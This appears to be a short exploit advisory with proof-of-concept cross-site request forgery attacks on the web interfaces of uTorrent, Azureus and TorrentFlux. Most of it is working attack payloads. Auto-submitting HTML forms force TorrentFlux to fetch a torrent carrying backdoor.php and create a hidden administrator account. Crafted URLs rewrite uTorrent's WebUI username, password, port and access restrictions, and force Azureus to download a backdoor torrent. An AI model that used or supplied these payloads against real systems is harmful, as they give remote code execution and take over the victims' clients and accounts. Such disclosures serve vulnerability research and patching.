The following are proof of concept exploits against three bittorrent clients. uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux.
More information: http://www.rooksecurity.com/blog/?p=10 TorrentFlux v2.3(Latest) http://sourceforge.net/projects/torrentflux/ If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by browsing here: http://localhost/torrentflux_2.3/html/downloads/USER_NAME/ You do not have to know a password to access this folder, but you will have to know the username. <html> <form id='file_attack' method="post" action="http://localhost/torrentflux_2.3/html/index.php";> <input type=hidden name="url_upload" value="http://localhost/backdoor.php.torrent";> <input type=submit value='file attack'> </from> <html> <script> document.getElementById('file_attack').submit(); </script> <html> Add an admistrative account: <form id=create_admin method=post action=http://localhost/torrentflux_2.3/html/admin.php?op=addUser> <input type=hidden name=newUser value=sadmin> <input type=hidden name=pass1″ value=password> <input type=hidden name=pass2″ value=password> <input type=hidden name=userType value=1> <input type=submit value=create admin> </form> </html> <script> document.getElementById(create_admin).submit(); </script> uTorrents WebUI is also affected: http://forum.utorrent.com/viewtopic.php?id=14565 force file download: http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent utorrent change administrative login information: http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096 After the username or password have been changed then the browser must re-authenticate. http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1 So is Azuruess HTML WebUI: Force file download: http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent
